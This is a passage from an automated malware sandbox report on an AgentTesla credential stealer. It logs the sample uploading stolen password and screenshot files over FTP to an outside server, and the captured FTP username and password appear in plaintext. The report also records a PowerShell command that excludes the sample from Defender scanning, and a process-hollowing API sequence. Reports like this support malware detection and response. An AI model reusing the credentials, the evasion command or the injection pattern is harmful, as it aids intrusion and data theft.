                                          Jun 27, 2024 09:23:16.054924011 CEST2149716104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:16.101367950 CEST4971621192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.974370003 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.979316950 CEST2149730104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:20.979377985 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.979593992 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:20.991204977 CEST2149730104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:20.991254091 CEST4973021192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.470098019 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.475111008 CEST2149731104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:31.479216099 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.479429960 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:31.484684944 CEST2149731104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:31.485219002 CEST4973121192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:47.451105118 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:47.456589937 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:47.456739902 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:48.114670992 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:48.115014076 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:48.115129948 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:48.118901014 CEST4973221192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:48.123773098 CEST2149732104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.113765001 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.118752956 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.118830919 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.756793022 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.756834984 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:53.757061005 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.762120962 CEST4973321192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:53.766899109 CEST2149733104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:57.529081106 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:57.540242910 CEST2149734104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:57.540328979 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:58.168155909 CEST2149734104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:58.168401957 CEST2149734104.247.165.99192.168.2.7
                                          Jun 27, 2024 09:23:58.168519020 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:58.168555021 CEST4973421192.168.2.7104.247.165.99
                                          Jun 27, 2024 09:23:58.173372984 CEST2149734104.247.165.99192.168.2.7

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 27, 2024 09:19:52.621262074 CEST6213653192.168.2.71.1.1.1
                                          Jun 27, 2024 09:19:52.667220116 CEST53621361.1.1.1192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Jun 27, 2024 09:19:52.621262074 CEST192.168.2.71.1.1.10xcfa7Standard query (0)ftp.normagroup.com.trA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Jun 27, 2024 09:19:52.667220116 CEST1.1.1.1192.168.2.70xcfa7No error (0)ftp.normagroup.com.tr104.247.165.99A (IP address)IN (0x0001)false

                                          FTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Jun 27, 2024 09:19:53.587408066 CEST2149703104.247.165.99192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                          Jun 27, 2024 09:19:53.587594032 CEST2149703104.247.165.99192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 17 of 50 allowed.220-Local time is now 10:19. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                          Jun 27, 2024 09:19:53.587610006 CEST4970321192.168.2.7104.247.165.99USER admin@normagroup.com.tr
                                          Jun 27, 2024 09:19:53.808285952 CEST2149703104.247.165.99192.168.2.7331 User admin@normagroup.com.tr OK. Password required
                                          Jun 27, 2024 09:19:53.808502913 CEST4970321192.168.2.7104.247.165.99PASS Qb.X[.j.Yfm[
                                          Jun 27, 2024 09:19:54.050478935 CEST2149703104.247.165.99192.168.2.7230 OK. Current restricted directory is /
                                          Jun 27, 2024 09:19:54.274281025 CEST2149703104.247.165.99192.168.2.7504 Unknown command
                                          Jun 27, 2024 09:19:54.274454117 CEST4970321192.168.2.7104.247.165.99PWD
                                          Jun 27, 2024 09:19:54.496164083 CEST2149703104.247.165.99192.168.2.7257 "/" is your current location
                                          Jun 27, 2024 09:19:54.496341944 CEST4970321192.168.2.7104.247.165.99TYPE I
                                          Jun 27, 2024 09:19:54.716557026 CEST2149703104.247.165.99192.168.2.7200 TYPE is now 8-bit binary
                                          Jun 27, 2024 09:19:54.716708899 CEST4970321192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:19:54.937917948 CEST2149703104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,209,103)
                                          Jun 27, 2024 09:19:54.944295883 CEST4970321192.168.2.7104.247.165.99STOR PW_user-899552_2024_06_27_03_19_51.html
                                          Jun 27, 2024 09:19:55.630709887 CEST2149703104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:19:55.862613916 CEST2149703104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.231 seconds (measured here), 1.36 Kbytes per second
                                          Jun 27, 2024 09:21:50.755276918 CEST2149716104.247.165.99192.168.2.7220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 10:21. Server port: 21.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 10:21. Server port: 21.220-This is a private system - No anonymous login
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 10:21. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                          220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 22 of 50 allowed.220-Local time is now 10:21. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                          Jun 27, 2024 09:21:50.757167101 CEST4971621192.168.2.7104.247.165.99USER admin@normagroup.com.tr
                                          Jun 27, 2024 09:21:50.971409082 CEST2149716104.247.165.99192.168.2.7331 User admin@normagroup.com.tr OK. Password required
                                          Jun 27, 2024 09:21:50.978455067 CEST4971621192.168.2.7104.247.165.99PASS Qb.X[.j.Yfm[
                                          Jun 27, 2024 09:21:51.241735935 CEST2149716104.247.165.99192.168.2.7230 OK. Current restricted directory is /
                                          Jun 27, 2024 09:21:51.456182957 CEST2149716104.247.165.99192.168.2.7504 Unknown command
                                          Jun 27, 2024 09:21:51.456425905 CEST4971621192.168.2.7104.247.165.99PWD
                                          Jun 27, 2024 09:21:51.671273947 CEST2149716104.247.165.99192.168.2.7257 "/" is your current location
                                          Jun 27, 2024 09:21:51.671910048 CEST4971621192.168.2.7104.247.165.99TYPE I
                                          Jun 27, 2024 09:21:51.885766983 CEST2149716104.247.165.99192.168.2.7200 TYPE is now 8-bit binary
                                          Jun 27, 2024 09:21:51.886185884 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:21:52.100177050 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,237,62)
                                          Jun 27, 2024 09:21:52.105901003 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_08_17_00_21_24.jpeg
                                          Jun 27, 2024 09:21:52.719655037 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:21:53.177844048 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.458 seconds (measured here), 141.89 Kbytes per second
                                          Jun 27, 2024 09:21:56.031335115 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:21:56.245140076 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,202,157)
                                          Jun 27, 2024 09:21:56.251194000 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_08_21_16_53_11.jpeg
                                          Jun 27, 2024 09:21:56.879386902 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:21:57.367839098 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.481 seconds (measured here), 134.94 Kbytes per second
                                          Jun 27, 2024 09:21:59.199033976 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:21:59.413633108 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,211,152)
                                          Jun 27, 2024 09:21:59.424755096 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_08_25_08_13_25.jpeg
                                          Jun 27, 2024 09:22:00.055372000 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:00.408893108 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:00.547805071 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.492 seconds (measured here), 131.95 Kbytes per second
                                          Jun 27, 2024 09:22:05.401655912 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:05.618824005 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,238,151)
                                          Jun 27, 2024 09:22:05.624507904 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_08_30_05_46_44.jpeg
                                          Jun 27, 2024 09:22:06.237168074 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:06.754448891 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.517 seconds (measured here), 134.77 Kbytes per second
                                          Jun 27, 2024 09:22:07.090320110 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.517 seconds (measured here), 134.77 Kbytes per second
                                          Jun 27, 2024 09:22:10.359616041 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:10.573729038 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,244,95)
                                          Jun 27, 2024 09:22:10.579487085 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_09_03_12_15_41.jpeg
                                          Jun 27, 2024 09:22:11.198812962 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:11.702671051 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.500 seconds (measured here), 129.90 Kbytes per second
                                          Jun 27, 2024 09:22:14.604408979 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:14.821157932 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,245,232)
                                          Jun 27, 2024 09:22:14.828476906 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_09_07_13_14_57.jpeg
                                          Jun 27, 2024 09:22:15.441502094 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:15.922286987 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.483 seconds (measured here), 134.59 Kbytes per second
                                          Jun 27, 2024 09:22:30.562160969 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:30.775743961 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,224,250)
                                          Jun 27, 2024 09:22:30.781390905 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_09_16_17_15_39.jpeg
                                          Jun 27, 2024 09:22:31.399080038 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:31.878870010 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.479 seconds (measured here), 135.49 Kbytes per second
                                          Jun 27, 2024 09:22:38.261220932 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:38.581157923 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,193,57)
                                          Jun 27, 2024 09:22:38.586810112 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_09_22_07_41_08.jpeg
                                          Jun 27, 2024 09:22:39.213048935 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:39.716248989 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.503 seconds (measured here), 129.21 Kbytes per second
                                          Jun 27, 2024 09:22:52.142447948 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:52.357814074 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,209,32)
                                          Jun 27, 2024 09:22:52.363390923 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_04_21_17_28.jpeg
                                          Jun 27, 2024 09:22:52.971976995 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:53.457544088 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.485 seconds (measured here), 133.88 Kbytes per second
                                          Jun 27, 2024 09:22:53.683054924 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:53.897341967 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,203,1)
                                          Jun 27, 2024 09:22:53.902882099 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_07_17_30_54.jpeg
                                          Jun 27, 2024 09:22:54.535080910 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:55.049315929 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.515 seconds (measured here), 126.18 Kbytes per second
                                          Jun 27, 2024 09:22:58.125581980 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:22:58.420330048 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,203,228)
                                          Jun 27, 2024 09:22:58.428961039 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_11_20_59_48.jpeg
                                          Jun 27, 2024 09:22:59.059892893 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:22:59.567600012 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.508 seconds (measured here), 127.94 Kbytes per second
                                          Jun 27, 2024 09:23:08.469485998 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:23:08.684155941 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,199,137)
                                          Jun 27, 2024 09:23:08.714421988 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_19_06_44_12.jpeg
                                          Jun 27, 2024 09:23:09.318080902 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:23:09.778636932 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.461 seconds (measured here), 145.84 Kbytes per second
                                          Jun 27, 2024 09:23:14.605659962 CEST4971621192.168.2.7104.247.165.99PASV
                                          Jun 27, 2024 09:23:14.971771002 CEST2149716104.247.165.99192.168.2.7227 Entering Passive Mode (104,247,165,99,203,216)
                                          Jun 27, 2024 09:23:14.977427006 CEST4971621192.168.2.7104.247.165.99STOR SC_user-899552_2024_10_24_04_03_45.jpeg
                                          Jun 27, 2024 09:23:15.587732077 CEST2149716104.247.165.99192.168.2.7150 Accepted data connection
                                          Jun 27, 2024 09:23:16.054924011 CEST2149716104.247.165.99192.168.2.7226-File successfully transferred
                                          226-File successfully transferred226 0.466 seconds (measured here), 139.22 Kbytes per second
                                          Jun 27, 2024 09:23:48.114670992 CEST2149732104.247.165.99192.168.2.7421 Too many connections (8) from this IP
                                          Jun 27, 2024 09:23:53.756793022 CEST2149733104.247.165.99192.168.2.7421 Too many connections (8) from this IP
                                          Jun 27, 2024 09:23:58.168155909 CEST2149734104.247.165.99192.168.2.7421 Too many connections (8) from this IP

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:03:19:48
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x220000
                                          File size:661'504 bytes
                                          MD5 hash:C96C8178B1018515D4B43E614A3E3F15
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:03:19:49
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0xc10000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:03:19:49
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x5f0000
                                          File size:661'504 bytes
                                          MD5 hash:C96C8178B1018515D4B43E614A3E3F15
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          General

                                          Target ID:5
                                          Start time:03:19:49
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:03:19:51
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff7fb730000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:10.4%
                                            Dynamic/Decrypted Code Coverage:98.9%
                                            Signature Coverage:0%
                                            Total number of Nodes:270
                                            Total number of Limit Nodes:9
                                            execution_graph 57549 757f000 57550 757f18b 57549->57550 57552 757f026 57549->57552 57552->57550 57553 757cb38 57552->57553 57554 757f280 PostMessageW 57553->57554 57555 757f2ec 57554->57555 57555->57552 57824 df4668 57825 df4672 57824->57825 57827 df4758 57824->57827 57828 df477d 57827->57828 57832 df4858 57828->57832 57836 df4868 57828->57836 57833 df488f 57832->57833 57835 df496c 57833->57835 57840 df44c4 57833->57840 57837 df488f 57836->57837 57838 df44c4 CreateActCtxA 57837->57838 57839 df496c 57837->57839 57838->57839 57841 df58f8 CreateActCtxA 57840->57841 57843 df59bb 57841->57843 57843->57843 57556 757c17f 57560 757dd7a 57556->57560 57580 757dd88 57556->57580 57557 757c18e 57561 757dda2 57560->57561 57571 757ddc6 57561->57571 57600 757ec3b 57561->57600 57605 757e3dd 57561->57605 57614 757eb7d 57561->57614 57618 757e69e 57561->57618 57622 757e63f 57561->57622 57630 757e513 57561->57630 57635 757eb13 57561->57635 57639 757e54a 57561->57639 57644 757e58c 57561->57644 57649 757e16c 57561->57649 57654 757e80d 57561->57654 57659 757e32f 57561->57659 57664 757e420 57561->57664 57673 757e3a2 57561->57673 57679 757e402 57561->57679 57684 757e246 57561->57684 57689 757e447 57561->57689 57571->57557 57581 757dda2 57580->57581 57582 757eb13 2 API calls 57581->57582 57583 757e513 2 API calls 57581->57583 57584 757e63f 4 API calls 57581->57584 57585 757e69e 2 API calls 57581->57585 57586 757eb7d 2 API calls 57581->57586 57587 757e3dd 4 API calls 57581->57587 57588 757ec3b 2 API calls 57581->57588 57589 757e447 2 API calls 57581->57589 57590 757e246 2 API calls 57581->57590 57591 757ddc6 57581->57591 57592 757e402 2 API calls 57581->57592 57593 757e3a2 2 API calls 57581->57593 57594 757e420 4 API calls 57581->57594 57595 757e32f 2 API calls 57581->57595 57596 757e80d 2 API calls 57581->57596 57597 757e16c 2 API calls 57581->57597 57598 757e58c 2 API calls 57581->57598 57599 757e54a 2 API calls 57581->57599 57582->57591 57583->57591 57584->57591 57585->57591 57586->57591 57587->57591 57588->57591 57589->57591 57590->57591 57591->57557 57592->57591 57593->57591 57594->57591 57595->57591 57596->57591 57597->57591 57598->57591 57599->57591 57601 757e824 57600->57601 57602 757ec48 57600->57602 57601->57600 57694 757b972 57601->57694 57698 757b978 57601->57698 57606 757e3ef 57605->57606 57607 757e40d 57606->57607 57702 757b3a0 57606->57702 57706 757b3a8 57606->57706 57608 757e969 57607->57608 57710 757aec0 57607->57710 57714 757aeb8 57607->57714 57608->57608 57609 757e7ee 57615 757ebb0 57614->57615 57616 757b972 WriteProcessMemory 57614->57616 57617 757b978 WriteProcessMemory 57614->57617 57616->57615 57617->57615 57718 757ba60 57618->57718 57722 757ba68 57618->57722 57619 757e483 57628 757b3a0 Wow64SetThreadContext 57622->57628 57629 757b3a8 Wow64SetThreadContext 57622->57629 57623 757e969 57624 757e465 57624->57623 57626 757aec0 ResumeThread 57624->57626 57627 757aeb8 ResumeThread 57624->57627 57625 757e7ee 57626->57625 57627->57625 57628->57624 57629->57624 57631 757e523 57630->57631 57633 757b972 WriteProcessMemory 57631->57633 57634 757b978 WriteProcessMemory 57631->57634 57632 757ebb0 57633->57632 57634->57632 57637 757b972 WriteProcessMemory 57635->57637 57638 757b978 WriteProcessMemory 57635->57638 57636 757eb37 57637->57636 57638->57636 57640 757e51f 57639->57640 57642 757b972 WriteProcessMemory 57640->57642 57643 757b978 WriteProcessMemory 57640->57643 57641 757ebb0 57642->57641 57643->57641 57645 757e512 57644->57645 57647 757b972 WriteProcessMemory 57645->57647 57648 757b978 WriteProcessMemory 57645->57648 57646 757ebb0 57647->57646 57648->57646 57649->57571 57650 757e171 57649->57650 57651 757e286 57650->57651 57726 757bc00 57650->57726 57730 757bbfa 57650->57730 57651->57571 57655 757e813 57654->57655 57656 757ec48 57655->57656 57657 757b972 WriteProcessMemory 57655->57657 57658 757b978 WriteProcessMemory 57655->57658 57657->57655 57658->57655 57660 757e344 57659->57660 57662 757b3a0 Wow64SetThreadContext 57660->57662 57663 757b3a8 Wow64SetThreadContext 57660->57663 57661 757e2b1 57661->57571 57662->57661 57663->57661 57665 757e3ef 57664->57665 57666 757e40d 57665->57666 57671 757b3a0 Wow64SetThreadContext 57665->57671 57672 757b3a8 Wow64SetThreadContext 57665->57672 57667 757e969 57666->57667 57669 757aec0 ResumeThread 57666->57669 57670 757aeb8 ResumeThread 57666->57670 57668 757e7ee 57669->57668 57670->57668 57671->57666 57672->57666 57674 757e344 57673->57674 57675 757e3ac 57674->57675 57677 757b3a0 Wow64SetThreadContext 57674->57677 57678 757b3a8 Wow64SetThreadContext 57674->57678 57676 757e2b1 57676->57571 57677->57676 57678->57676 57680 757ec4e 57679->57680 57734 757b8b2 57680->57734 57738 757b8b8 57680->57738 57681 757e2b1 57681->57571 57685 757e24c 57684->57685 57687 757bc00 CreateProcessA 57685->57687 57688 757bbfa CreateProcessA 57685->57688 57686 757e286 57686->57571 57687->57686 57688->57686 57690 757e44d 57689->57690 57692 757aec0 ResumeThread 57690->57692 57693 757aeb8 ResumeThread 57690->57693 57691 757e7ee 57692->57691 57693->57691 57695 757b976 WriteProcessMemory 57694->57695 57697 757ba17 57695->57697 57697->57601 57699 757b9c0 WriteProcessMemory 57698->57699 57701 757ba17 57699->57701 57701->57601 57703 757b3a8 Wow64SetThreadContext 57702->57703 57705 757b435 57703->57705 57705->57607 57707 757b3ed Wow64SetThreadContext 57706->57707 57709 757b435 57707->57709 57709->57607 57711 757af00 ResumeThread 57710->57711 57713 757af31 57711->57713 57713->57609 57715 757aec0 ResumeThread 57714->57715 57717 757af31 57715->57717 57717->57609 57719 757ba68 ReadProcessMemory 57718->57719 57721 757baf7 57719->57721 57721->57619 57723 757bab3 ReadProcessMemory 57722->57723 57725 757baf7 57723->57725 57725->57619 57727 757bc89 CreateProcessA 57726->57727 57729 757be4b 57727->57729 57731 757bc00 CreateProcessA 57730->57731 57733 757be4b 57731->57733 57735 757b8b8 VirtualAllocEx 57734->57735 57737 757b935 57735->57737 57737->57681 57739 757b8f8 VirtualAllocEx 57738->57739 57741 757b935 57739->57741 57741->57681 57503 5730238 57504 5730260 57503->57504 57505 5730288 57504->57505 57508 57302d0 57504->57508 57513 57302e8 57504->57513 57509 